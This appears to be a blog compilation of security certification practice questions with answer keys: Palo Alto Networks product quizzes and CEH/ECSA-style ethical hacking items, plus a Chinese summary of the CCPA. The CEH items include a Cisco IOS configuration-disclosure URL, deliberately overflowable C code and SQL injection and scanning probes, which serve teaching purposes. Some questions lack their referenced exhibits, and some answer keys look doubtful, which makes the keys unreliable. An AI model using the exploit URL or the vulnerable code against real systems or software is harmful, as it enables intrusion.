What happens when access to an application is allowed in a firewall Security policy, but the allowed application implicitly depends on other parent applications or services that otherwise would not be allowed?
  The firewall automatically allows the dependencies required for the newly allowed application, and the firewall provides a warning that it is doing so.
  The security administrator must specify to the firewall what these dependent applications are.
  The newly allowed application itself is allowed, but because it depends on other applications, it cannot be used until they too are explicitly allowed.
  The firewall does not “allow applications,” but rather enforces security based on traffic independently of which application generates it.
 Mark for follow up


Question 8 of 30. [A]
Palo Alto Networks recommends which approach to cybersecurity?
  Zero trust. All traffic is inspected.
  Always trust, inspect all traffic afterward.
  Trust most things, but don’t trust suspicious traffic.
  Trust everything except recognized threats.
 Mark for follow up


Question 25 of 30. [AB]
Which two Palo Alto Networks security products can prevent successful ransomware attacks? (Choose two.)
  Traps
  NGFW
  Panorama
  SLR
 Mark for follow up


Question 17 of 30. [A]
In the Threat Prevention demo, how is WildFire® used to strengthen the security of the environment?
  When an unknown file is downloaded as a result of a visit to a website, the file is sent to WildFire® for analysis.
  When an Antivirus Profile is attached to a security rule, WildFire® confirms that the viruses blocked by the firewall are still viruses.
  When a file is transferred that contains sensitive data, WildFire® identifies that file as containing sensitive data.
  All traffic going through the firewall is vetted by WildFire®.
 Mark for follow up


Question 21 of 30. [A]
How can a security engineer block all files that contain strings that start with any letters or numbers and contain “pw” or “PW” followed by any numbers?
  Using a pattern definition with regular-expression pattern matching.
  Creating a virus signature to match viruses that steal passwords.
  Treating these filenames as HTTP addresses and using URL filtering.
  Using App-ID to block an identified program that processes files with “PW” or “pw” in them.
 Mark for follow up


Question 25 of 30. [A]
When a file is uploaded for WildFire® analysis, how can its verdict be found?
  Viewing WildFire® submission logs from the firewall’s user interface.
  Examining the security rule that allowed the traffic from the firewall’s user interface.
  Only by accessing the WildFire® user interface.
  The verdict is never seen explicitly, it automatically is incorporated into the firewall’s Security policy.
 Mark for follow up


Question 15 of 30. [A]
Which answer best describes the meaning of the above picture in the context of Palo Alto Networks Security Lifecycle Reviews?
  The firewall in Tap mode connects to a switch and does not impact customer traffic at all.
  The firewall essentially is a router on a stick.
  Firewalls can connect only to customer switches, they cannot connect to customer routers.
  Firewalls involved in Security Lifecycle Reviews use wireless interfaces only.
 Mark for follow up


Question 4 of 30. [A]
Magnifier analyzes logs from:
  Palo Alto Networks Logging Service.
  Panorama distributed log collectors.
  Aperture logs.
  Traps logs.
 Mark for follow up


Question 18 of 30. [A]
When is it helpful to run a Security Lifecycle Review?
  for existing customers as a health check and for potential customers to help build a business case for Palo Alto Networks
  primarily to help Customer Support learn more about support cases
  only for existing customers, to determine features and functions of the security environment that are not fully or properly utilized
  only for potentially new customers, to expose the security weaknesses of their existing security environment
 Mark for follow up


Question 2 of 30. [A]
What is the recommended process of configuring a firewall to ensure that all traffic going through it is logged?
  Override the intrazone-default and interzone-default rules by clicking their Log at Session End boxes.
  Add a rule before the default rules that denies all traffic and logs.
  No process is necessary because the Palo Alto Networks NGFW always logs all traffic.
  Add a rule that allows everything from everywhere as the first rule and logs all traffic that it allows.
 Mark for follow up


Question 3 of 30. [A]
Which option best describes the role of App-ID in Palo Alto Networks NGFW Security policy?
  Application data payload is considered as part of the NGFW security rule matching process.
  The firewall automatically disallows a competitor’s applications for security reasons.
  App-ID is the firewall’s way of identifying which user’s traffic is associated with an application.
  App-ID allows administrators to rename standard applications with internal nicknames.
 Mark for follow up


Question 8 of 30. [A]
What is the Palo Alto Networks NGFW recommended security policy?
  Only traffic that is explicitly allowed passes through the firewall.
  Only traffic that is explicitly denied is prevented from passing through the firewall.
  Only traffic from recognized users is allowed to pass through the firewall.
  Only traffic from unrecognized applications is prevented from passing through the firewall.
 Mark for follow up


Question 15 of 30. [A]
Which Palo Alto Networks Security Operating Platform component is best suited to find and block zero-day threats on an employee’s laptop?
  Traps
  NGFW
  Magnifier
  Aperture
 Mark for follow up

Question 13 of 30. [A]
Which part of the Palo Alto Security Operating Platform uses multiple methods to disrupt an attack before it can infect an endpoint?
  Traps
  Panorama
  Magnifier
  Logging Service
 Mark for follow up

Question 16 of 30. [A]
Which answer best describes User-ID?
  User-ID combines multiple methods to map IP addresses to users, and once users are mapped, they can be used by firewall Security policy rules and reports.
  User-ID is the firewall’s internal storage of encrypted passwords, providing access control to firewall administrative functionality.
  User-ID is another name for App-ID; applications are considered users of the traffic control function of the firewall.
  User-ID is how GlobalProtect knows who can use its service.
 Mark for follow up

Question 19 of 30. [A]
Aperture is a product that addresses which kind of security?
  SaaS
  data center
  endpoint
  inline network
 Mark for follow up


Question 11 of 30. [A]
Which file should be uploaded to the Security Lifecycle Review tool?
  Stats Dump file
  SLR report csv
  Exported config file
  SaaS Risk Assessment Report
 Mark for follow up

Question 17 of 30. [A]
Which part of the Palo Alto Networks Security Operating Platform helps customers accelerate their consumption of innovative cloud security offerings?
  Application Framework
  Generation Alpha Firewall
  Magnifier
  Aperture
 Mark for follow up

Question 2 of 30. [A]
Which option helps to find the security rule that allowed traffic from a particular application at a particular time?
  the log at NGFW Monitor > Traffic
  BPA heatmap
  Aperture SaaS Risk Assessment Report
  WildFire® verdict
 Mark for follow up

Question 13 of 30. [A]
What is the purpose of the “Executive Summary“ section of the SLR?
  highlight key findings of the Security Lifecycle Review
  summarize pricing for addressing issues identified by an SLR
  show the Set Least Resistance properties in one place
  summarize pricing for a large proposal
 Mark for follow up

Question 8 of 30. [A]
Which demo would you present to showcase abnormalities in network traffic?
  Magnifier
  The Best Practices Analysis report
  Traps
  The firewall
 Mark for follow up


Question 2 of 30. [A]
Which answer best describes the sales cycle role that a Security Lifecycle Review (SLR) provides?
  The SLR is a way to use a prospect’s own data to show where the Palo Alto Networks Security Operating Platform can help them.
  Security Lifecycle Reviews can provide automated enforcement for best practices when a single NGFW is left at the customer for six months or more.
  The SLR report is a way to show the kind of reports that can be generated after a customer purchases a comprehensive security platform from Palo Alto Networks.
  Because it takes so much time, an SLR often lengthens the firewall sales cycle.
 Mark for follow up

 Question 20 of 30. [A]
Which tool most directly helps a customer’s engineer to systematically check a previous engineer’s Palo Alto Networks NGFW configuration for general cyber hygiene?
  Best Practices Analysis tool
  NGFW ACC page
  Aperture Explore Assets tool
  Panorama
 Mark for follow up

 Question 25 of 30. [ABC]
Which three components are commonly used to contribute to public cloud security? (Choose three.)
  SaaS security
  endpoint security
  inline security in the cloud
  physical router and switch security
 Mark for follow up

 Question 11 of 30. [A]
Which product can be characterized as an API-based CASB?
  Aperture
  SLR
  Magnifier
  NGFW
 Mark for follow up



---- the answer is not [A] ---------------

Question 7 of 30.
Which Palo Alto Networks Security Operating Platform component can observe the behavior of an unknown file in a simulated environment and provide a verdict?
  Aperture
  App-ID
  Magnifier
  WildFire®
 Mark for follow up


 Question 13 of 30.
Which answer best describes the relationship between security rules and security profiles in a Palo Alto Networks next-generation firewall?
  Profiles apply only to traffic that a rule allows.
  Profiles apply only to traffic that a rule denies.
  The profiles characterize the rules for easy communication and management.
  The profiles characterize the data to determine which rules apply.
 Mark for follow up

## Question 15 of 30.
![](https://i.imgur.com/Id3Iu20.jpg)
The above image, from the Threat Prevention and Next Generation Firewall demo in this course, is captured from the traffic monitor page of the firewall. Why was traffic allowed between the source address of 192.168.1.254 and destination address 199.167.52.141?
  Every row of the Action column has “allow,” and that means the firewall allows all traffic by default.
  The security rule “inside-to-web-access” allowed this web browsing traffic.
  The traffic monitor page shows a tunnel that allows traffic to flow from inside the enterprise network to the cloud.
  The image shows the universal web server in the lab, which allows all web browsing traffic from inside or outside the protected network.
 Mark for follow up

## Question 24 of 30.
Magnifier identifies behavioral anomalies by:
  Comparing customer traffic behavior to a huge database of that customer’s competitors’ traffic behavior.
  Comparing customer behavior with an up-to-the-minute list of abnormal behavior.
  Comparing differences among data from Traps, Aperture, the next-generation firewall, and GlobalProtect agents.
  Comparing customer behavior to known behaviors found in environments with good security hygiene.
  Building a baseline of normal customer-specific activity by analyzing collected data over 30 days and comparing new traffic and host profile data to that baseline.
 Mark for follow up

 Question 27 of 30.
Magnifier is best characterized as an application that provides:
  visibility into a monitored environment.
  a way to scale institutional security to very large independent sovereign states.
  behavioral analytics on data from a monitored environment.
  enforcement of Security policy into a monitored environment.
 Mark for follow up

 Question 9 of 30.
The firewall is set up to block certain file types. A user tries to receive a file with an extension normally associated with an allowed file type. What happens?
  The firewall uses App-ID to identify which application generated the file, and then the firewall uses WildFire® to determine if that application is malware.
  The firewall uses anti-spyware and antivirus techniques to determine whether to block the file and does not consider the file’s type.
  The firewall examines the content of the file to determine which type it is and blocks the file if it is of a blocked type.
  The firewall allows transfer of files with extensions associated with allowed types.
 Mark for follow up



2019年3月11日 星期一

2018年加州消費者隱私法案 (California Consumer Privacy Act of 2018)


加利福尼亞州擁有超過4千萬人口和世界第五大經濟體,已通過加州消費者隱私法(CCPA),即其綜合消費者隱私法。該法律為加利福尼亞州居民的員工或客戶提供了有關收集,維護和跟踪信息的全新要求。加州檢察長仍在最後確定執行和執行的許多方面。但是,在加利福尼亞州擁有員工或客戶的公司需要對他們正在處理的信息進行評估,這些信息可能會成為加州居民的“個人信息”,他們需要在2019年底之前開始建立合規機制。

加州消費者隱私法案
自2020年1月1日起,該法律適用於在加利福尼亞州收集,銷售或披露個人信息的企業。總之,其預期目的是要求受影響的企業提供增強的透明度並賦予消費者控制其個人信息的權利。具體而言,其目標是通過確保各種權利來進一步增強加州消費者的隱私權,包括:1)了解收集的個人信息; 2)了解他們的個人信息是否被出售或披露以及向誰透露; 3)拒絕出售他們的個人信息; 4)訪問他們的個人信息; 5)平等的服務和價格,即使他們行使個人權利。

哪些公司受到影響?
如果以下情況,CCPA適用於在加利福尼亞開展業務的公司或員工:

每年產生2500萬美元或更多的收入;
每年為商業目的購買,接收,出售或分享50,000個或更多消費者,家庭或設備的個人信息; 要么通過銷售消費者個人信息獲得其年收入的50%或更多。
它的含義及其重要性
首先,法律適用的幾個術語具有廣泛的中風含義。這些條款:1)確定哪些組織必須遵守法律; 2)確定個人信息的範圍; 3)確定法律適用的個人信息; 4)通過廣泛的“銷售”定義,將個人信息確認為資產。這些條款包括:

業務定義為任何在加利福尼亞州開展業務以獲取個人信息並且(i)年度總收入超過2500萬美元的公司; (ii)每年為50,000或以上的消費者,住戶或設備購買,出售,接收或分享商業用途的個人信息; 或(iii)從銷售消費者個人信息中獲得其年收入的50%或以上。請注意,“銷售”和“個人信息”都是業務定義的組成部分。
個人信息被定義為包括識別,關聯,描述,能夠與特定消費者或家庭直接或間接相關聯,合理鏈接的任何事物,包括但不限於以下內容:
個體標識符例如真實姓名,別名,郵政地址,唯一個人識別碼,互聯網協議地址,電子郵件地址,帳戶名稱,社會安全號碼,護照號碼或其他類似標識符; 地理位置數據; 生物信息; 互聯網或其他電子網絡活動; 音頻,電子,視覺,熱,嗅覺或類似信息; 可以從任何先前信息中提取的推論,以便創建配置文件; 而這樣的例子不勝枚舉。
消費者被定義為加州居民的自然人,包括任何唯一標識符。(注意:居民是指(1)每個在該州以外的人為臨時或暫時目的以外的人;(2)在該州境外居住的所有人為臨時或暫時目的而居住的。所有其他人是非居民。)
出售或變體這個詞意味著出售,出租,發布,披露,傳播,提供,轉讓或以其他方式口頭,書面或通過電子或其他方式將消費者的個人信息通過一個承保企業轉讓給另一個企業或第三方用於貨幣或其他有價值的考慮。
這些術語以及其他定義一起應用於法律規定的法律要求,導致許多在加利福尼亞州開展業務的組織的合規義務。

其次,在CCPA下,州立法機構已責成加州檢察長負有執行其規定的主要責任。作為執法部門,司法部長擁有各種執法機制。例如,這包括在30天違規通知到期和糾正機會到期時通過行政罰款懲罰不合規組織的能力。每次違規罰款不得超過2,500美元,故意違規罰款不得超過7,500美元。

更重要的是,司法部長有權決定組織必須如何遵守。在上面的示例中,這可能包括定義構成違規的內容。根據司法部長如何定義違規行為,可能會導致極為不同的處罰。鑑於法律剛剛通過,目前尚不清楚司法部長將如何執行法規或確定是否針對特定情況發生了違規行為。也就是說,法律賦予司法部長廣泛的自由裁量權。“

需要採取行動
在加利福尼亞開展業務的公司需要知道什麼
儘管生效日期為2020年1月1日,但對於受影響的加利福尼亞州企業是否合規,由於法律的複雜性,建議公司開始協調努力,以便更快地遵守。

除了採取某些步驟以遵守和加強有關個人信息隱私的消費者權利外,企業還必須:

執行數據清單以識別信息流。完成後,企業需要確定影響合規性的問題,並製定控製或對策來解決這些問題。
為加州消費者提供兩種或更多種方法來提交他們的信息請求 - 至少包括免費電話號碼。
根據其在線隱私政策或政策(如果存在)或在其網站上的其他情況,根據本法披露有關個人信息的收集,使用和銷售以及一種或多種指定的提交請求方法的消費者權利的描述,並提供其收集,出於商業目的披露或在過去12個月內通過參考法律中特定類別的個人信息出售的個人信息類別列表 - 或者如果業務尚未這樣做,則披露那個事實。所發布的信息必須至少每12個月更新一次。
在其網站主頁上,提供指向“不要出售我的個人信息”的網頁的鏈接,以允許客戶(或其代理人)選擇將其個人信息出售給第三方。除此鏈接外,企業還必須在其在線隱私政策或政策(如果存在)中包含對消費者權利的描述以及上述標題為“不銷售我的個人信息”頁面的單獨鏈接,以及加利福尼亞州對消費者隱私權的具體描述。
實施和維護適合個人信息性質的合理安全程序和做法。
x

2019年3月10日 星期日

EC$A

Your company's network just finished going through a SAS 70 audit. This audit reported that overall, your network is secure, but there are some areas that needs improvement. The major area was SNMP security. The audit company recommended turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP on your network?
A. Change the default community string names
B. Block all internal MAC address from using SNMP
C. Block access to UDP port 171
D. Block access to TCP port 171
A

At what layer of the OSI model do routers function on?
A. 3
B. 4
C. 5
D. 1
A

An "idle" system is also referred to as what?
A. Zombie
B. PC not being used
C. Bot
D. PC not connected to the Internet
A

What operating system would respond to the following command?
A. Mac OS X
B. Windows XP
C. Windows 95
D. FreeBSD
D

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?
A. Windows computers will not respond to idle scans
B. Linux/Unix computers are constantly talking
C. Linux/Unix computers are easier to compromise
D. Windows computers are constantly talking
D

How many bits is Source Port Number in TCP Header packet?
A. 48
B. 32
C. 64
D. 16
D


Why are Linux/Unix based computers better to use than Windows computers for idle scanning?
A. Windows computers are constantly talking
B. Linux/Unix computers are constantly talking
C. Linux/Unix computers are easier to compromise
D. Windows computers will not respond to idle scans
A

Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company's network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?
A. Enumerate all the users in the domain
B. Perform DNS poisoning
C. Send DOS commands to crash the DNS servers
D. Perform a zone transfer
D

After attending a CEH security seminar, you make a list of changes you would like to perform on your network to increase its security. One of the first things you change is to switch the RestrictAnonymous setting from 0 to 1 on your servers. This, as you were told, would prevent anonymous users from establishing a null session on the server. Using Userinfo tool mentioned at
the seminar, you succeed in establishing a null session with one of the servers. Why is that?
A. RestrictAnonymous must be set to "2" for complete security
B. RestrictAnonymous must be set to "3" for complete security
C. There is no way to always prevent an anonymous null session from establishing
D. RestrictAnonymous must be set to "10" for complete security
A

What will the following command accomplish?
A. Test ability of a router to handle over-sized packets
B. Test the ability of a router to handle fragmented packets
C. Test the ability of a WLAN to handle fragmented packets
D. Test the ability of a router to handle under-sized packets
A

What are the security risks of running a "repair" installation for Windows XP?
A. There are no security risks when running the "repair" installation for Windows XP
B. Pressing Shift+F1 gives the user administrative rights
C. Pressing Ctrl+F10 gives the user administrative rights
D. Pressing Shift+F10 gives the user administrative rights
D

You are the security analyst working for a private company out of France. Your current assignment is to obtain credit card information from a Swiss bank owned by that company. After initial reconnaissance, you discover that the bank security defenses are very strong and would take too long to penetrate. You decide to get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After monitoring some of the traffic, you see a lot of FTP packets traveling back and forth. You want to sniff the traffic and extract usernames and passwords. What
tool could you use to get this information?
A. RaidSniff
B. Snort
C. Ettercap
D. Airsnort
C

George is the network administrator of a large Internet company on the west coast. Per corporate policy, none of the employees in the company are allowed to use FTP or SFTP programs without obtaining approval from the IT department. Few managers are using SFTP program on their computers. Before talking to his boss, George wants to have some proof of their activity.
George wants to use Ethereal to monitor network traffic, but only SFTP traffic to and from his network. What filter should George use in Ethereal?
A. net port 22
B. udp port 22 and host 172.16.28.1/24
C. src port 22 and dst port 22
D. src port 23 and dst port 23
C

You are assisting a Department of Defense contract company to become compliant with the stringent security policies set by the DoD. One such strict rule is that firewalls must only allow incoming connections that were first initiated by internal computers. What type of firewall must you implement to abide by this policy?
A. Circuit-level proxy firewall
B. Packet filtering firewall
C. Application-level proxy firewall
D. Statefull firewall
D

You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that you are testing?
A. Metamorphic
B. Oligomorhic
C. Polymorphic
D. Transmorphic
A

In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to mimic the backbone of the Internet. This project will help him write his doctoral thesis on "bringing down the Internet". Without sniffing the traffic between the routers, Michael sends millions of RESET packets to the routers in an attempt to shut one or all of them down. After a few hours, one of the routers finally shuts itself down. What will the other routers communicate
between themselves?
A. More RESET packets to the affected router to get it to power back up
B. RESTART packets to the affected router to get it to power back up
C. The change in the routing fabric to bypass the affected router
D. STOP packets to all other routers warning of where the attack originated
C

What is the following command trying to accomplish?
A. Verify that NETBIOS is running for the 192.168.0.0 network
B. Verify that TCP port 445 is open for the 192.168.0.0 network
C. Verify that UDP port 445 is open for the 192.168.0.0 network
D. Verify that UDP port 445 is closed for the 192.168.0.0 network
C

Your company uses Cisco routers exclusively throughout the network. After securing the routers to the best of your knowledge, an outside security firm is brought in to assess the network security. Although they found very few issues, they were able to enumerate the model, OS version, and capabilities for all your Cisco routers with very little effort. Which feature will you disable to eliminate the ability to enumerate this information on your Cisco routers?
A. Simple Network Management Protocol
B. Broadcast System Protocol
C. Cisco Discovery Protocol
D. Border Gateway Protocol
C

George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities of their wireless network. He plans on remaining as "stealthy" as possible during the scan. Why would a scanner like Nessus is not recommended in this situation?
A. Nessus is too loud
B. There are no ways of performing a "stealthy" wireless scan
C. Nessus cannot perform wireless testing
D. Nessus is not a network scanner
A

Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify the results of the vulnerability test. The second utility executes five known exploits against his network in which the vulnerability analysis said were not exploitable. What kind of results did Jim receive from his vulnerability analysis?
A. True negatives
B. False negatives
C. False positives
D. True positives
B

You work as a penetration tester for Hammond Security Consultants. You are currently working on a contract for the state government of California. Your next step is to initiate a DoS attack on their network. Why would you want to initiate a DoS attack on a system you are testing?
A. Use attack as a launching point to penetrate deeper into the network
B. Demonstrate that no system can be protected against DoS attacks
C. List weak points on their network
D. Show outdated equipment so it can be replaced
C

To test your website for vulnerabilities, you type in a quotation mark (? for the username field.
After you click Ok, you receive the following error message window:
What can you infer from this error window?
Exhibit: 23
A. SQL injection is not possible
B. SQL injection is possible
C. The user for line 3306 in the SQL database has a weak password
D. The quotation mark (? is a valid username
B

You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive footprinting against their Web servers. What tool should you use?
A. Nmap
B. Netcraft
C. Ping sweep
D. Dig
B

After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, statefull firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that?
A. IPSEC does not work with packet filtering firewalls
B. NAT does not work with IPSEC
C. NAT does not work with statefull firewalls
D. Statefull firewalls do not work with packet filtering firewalls
B

Harold is a web designer who has completed a website for ghttech.net. As part of the maintenance agreement he signed with the client, Harold is performing research online and seeing how much exposure the site has received so far. Harold navigates to google.com and types in the following search.
link:www.ghttech.net
What will this search produce?
A. All sites that link to ghttech.net
B. Sites that contain the code: link:www.ghttech.net
C. All sites that ghttech.net links to
D. All search engines that link to .net domains
A

On Linux/Unix based Web servers, what privilege should the daemon service be run under?
A. Guest
B. You cannot determine what privilege runs the daemon service
C. Root
D. Something other than root
D

Jason has set up a honeypot environment by creating a DMZ that has no physical or logical access to his production network. In this honeypot, he has placed a server running Windows Active Directory. He has also placed a Web server in the DMZ that services a number of web pages that offer visitors a chance to download sensitive information by clicking on a button. A
week later, Jason finds in his network logs how an intruder accessed the honeypot and downloaded sensitive information. Jason uses the logs to try and prosecute the intruder for stealing sensitive corporate information. Why will this not be viable?
A. Intruding into a honeypot is not illegal
B. Entrapment
C. Intruding into a DMZ is not illegal
D. Enticement
B

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?
A. Smurf scan
B. Tracert
C. Ping trace
D. ICMP ping sweep
D

Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for Harold? needs?
A. Application-level proxy firewall
B. Data link layer firewall
C. Packet filtering firewall
D. Circuit-level proxy firewall
A

Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?
A. Only an HTTPS session can be hijacked
B. Only DNS traffic can be hijacked
C. Only FTP traffic can be hijacked
D. HTTP protocol does not maintain session
D

What is a good security method to prevent unauthorized users from "tailgating"?
A. Electronic key systems
B. Man trap
C. Pick-resistant locks
D. Electronic combination locks
B

If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?
A. 31401
B. The zombie will not send a response
C. 31402
D. 31399
A

What is the following command trying to accomplish?
C:\>nmap -sU -p445 192.168.0.0/24

A. Verify that TCP port 445 is open for the 192.168.0.0 network
B. Verify that UDP port 445 is open for the 192.168.0.0 network
C. Verify that UDP port 445 is closed for the 192.168.0.0 network
D. Verify that NETBIOS is running for the 192.168.0.0 network
B

When setting up a wireless network with multiple access points, why is it important to set each access point on a different channel?
A. Avoid cross talk
B. Avoid over-saturation of wireless signals
C. So that the access points will work on different frequencies
D. Multiple access points can be set up on the same channel without any issues
A

A packet is sent to a router that does not have the packet destination address in its route table, how will the packet get to its proper destination address in its route table?
A. Root Internet servers
B. Border Gateway Protocol
C. Gateway of last resort
D. Reverse DNS
C

Larry is an IT consultant who works for corporations and government agencies. Larry plans on shutting down the city's network using BGP devices and zombies? What type of Penetration Testing is Larry planning to carry out?
A. Internal Penetration Testing
B. Firewall Penetration Testing
C. DoS Penetration Testing
D. Router Penetration Testing
C

You are a security analyst performing reconnaissance on a company you will be carrying out a penetration test for. You conduct a search for IT jobs on Dice.com and find the following information for an open position:
7+ years experience in Windows Server environment
5+ years experience in Exchange 2000/2003 environment
Experience with Cisco Pix Firewall, Linksys 1376 router, Oracle 11i and MYOB v3.4 Accounting
software are required MCSA desired,
MCSE, CEH preferred
No Unix/Linux Experience needed
What is this information posted on the job website considered?

A. Information vulnerability
B. Social engineering exploit
C. Trade secret
D. Competitive exploit
A

Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response. In what state are these ports?
A. Filtered
B. Stealth
C. Closed
D. Open
D

John and Hillary works at the same department in the company. John wants to find out Hillary's network password so he can take a look at her documents on the file server. He enables Lophtcrack program to sniffing mode. John sends Hillary an email with a link to Error! Reference source not found. What information will he be able to gather from this?
A. The SID of Hillary's network account
B. The network shares that Hillary has permissions
C. The SAM file from Hillary's computer
D. Hillary's network username and password hash
D

Terri works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri's duties include bypassing firewalls and switches to gain access to the network. Terri sends an IP packet to one of the company's switches with ACK bit and the source address of her machine set. What is Terri trying to accomplish by sending this IP packet?
A. Poison the switch's MAC address table by flooding it with ACK bits
B. Enable tunneling feature on the switch
C. Trick the switch into thinking it already has a session with Terri's computer
D. Crash the switch with a DoS attack since switches cannot send ACK bits
C

Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away.
Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler issue
with his home wireless network?
A. 2.4 Ghz Cordless phones
B. Satellite television
C. CB radio
D. Computers on his wired network
A

You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here?
A. Enumerate domain user accounts and built-in groups
B. Establish a remote connection to the Domain Controller
C. Poison the DNS records with false records
D. Enumerate MX and A records from DNS
A

Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company's network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?
A. Perform a zone transfer
B. Perform DNS poisoning
C. Send DOS commands to crash the DNS servers
D. Enumerate all the users in the domain
A

Why is it a good idea to perform a penetration test from the inside?
A. It is easier to hack from the inside
B. It is never a good idea to perform a penetration test from the inside
C. To attack a network from a hacker's perspective
D. Because 70% of attacks are from inside the organization
D

Paulette works for an IT security consulting company that is currently performing an audit for the firm ACE Unlimited. Paulette's duties include logging on to all the company's network equipment to ensure IOS versions are up-to-date and all the other security settings are as stringent as possible. Paulette presents the following screenshot to her boss so he can inform the client about necessary changes need to be made. From the exhibit, what changes should the client company make?
Exhibit:
...............................................................................................................
AUTHORIZED ACCESS ONLY
ONLY AUTHORIZED IT PERSONAL MAY PROCEED

CISCO PIX 5613 V1.9
IOS 6.4.2

FOR TECHNICAL DIFFICULTIES
CALL IT SUPPORT AT 302-545-6554
OR E-MAIL TO SUPPORT@HAYESLTD.COM
...............................................................................................................


A. The banner should not state "only authorized IT personnel may proceed"
B. Remove any identifying numbers, names, or version information
C. The banner should include the Cisco tech support contact information as well
D. The banner should have more detail on the version numbers for the network equipment
B

An "idle" system is also referred to as what?
A. PC not being used
B. PC not connected to the Internet
C. Bot
D. Zombie
D

Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify the results of the vulnerability test. The second utility executes five known exploits against his network in which the vulnerability analysis said were not exploitable. What kind of results did Jim receive from his vulnerability analysis?
A. False negatives
B. True positives
C. True negatives
D. False positives
A

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate to archive.org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal:
<img src=http://coolwebsearch.com/ads/pixel.news.com width=1 height=1 border=0>
What have you found?
A. Trojan.downloader
B. Blind bug
C. Web bug
D. CGI code
C

You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here?
A. Poison the DNS records with false records
B. Enumerate MX and A records from DNS
C. Enumerate domain user accounts and built-in groups
D. Establish a remote connection to the Domain Controller
C

You are trying to locate Microsoft Outlook Web Access Default Portal using Google search on the Internet. What search string will you use to locate them?
A. intitle:"exchange server"
B. outlook:"search"
C. locate:"logon page"
D. allinurl:"exchange/logon.asp"
D

After undergoing an external IT audit, George realizes his network is vulnerable to DDoS attacks. What countermeasures could he take to prevent DDoS attacks?
A. Enable BGP
B. Disable BGP
C. Enable direct broadcasts
D. Disable direct broadcasts
D

You are a security analyst performing a penetration tests for a company in the Midwest. After some initial reconnaissance, you discover the IP addresses of some Cisco routers used by the company. You type in the following URL that includes the IP address of one of the routers:
http://172.168.4.131/level/99/exec/show/config
After typing in this URL, you are presented with the entire configuration file for that router. What have you discovered?
A. URL Obfuscation Arbitrary Administrative Access Vulnerability
B. Cisco IOS Arbitrary Administrative Access Online Vulnerability
C. HTTP Configuration Arbitrary Administrative Access Vulnerability
D. HTML Configuration Arbitrary Administrative Access Vulnerability
C

Kyle is performing the final testing of an application he developed for the accounting department. His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point?
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[10];
if (argc < 2)
{
fprintf(stderr, "USAGE: %s string\n", argv[0]);
return 1;
}
strcpy(buffer, argv[1]);

return 0;
}
A. Buffer overflow
B. Format string bug
C. Kernal injection
D. SQL injection
A

Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related. What organization should
Frank submit the log to find out if it is a new vulnerability or not?
A. CVE
B. IANA
C. RIPE
D. APIPA
A

George is a senior security analyst working for a state agency in Florida. His state's congress just passed a bill mandating every state agency to undergo a security audit annually. After learning what will be required, George needs to implement an IDS as soon as possible before the first audit occurs. The state bill requires that an IDS with a "time-based induction machine" be used. What IDS feature must George implement to meet this requirement?
A. Pattern matching
B. Statistical-based anomaly detection
C. Real-time anomaly detection
D. Signature-based anomaly detection
C

Software firewalls work at which layer of the OSI model?
A. Data Link
B. Network
C. Transport
D. Application
A

The objective of this act was to protect consumers personal financial information held by financial institutions and their service providers.
A. HIPAA
B. Sarbanes-Oxley 2002
C. Gramm-Leach-Bliley Act
D. California SB 1386
C

What does ICMP Type 3/Code 13 mean?
A. Host Unreachable
B. Port Unreachable
C. Protocol Unreachable
D. Administratively Blocked
D

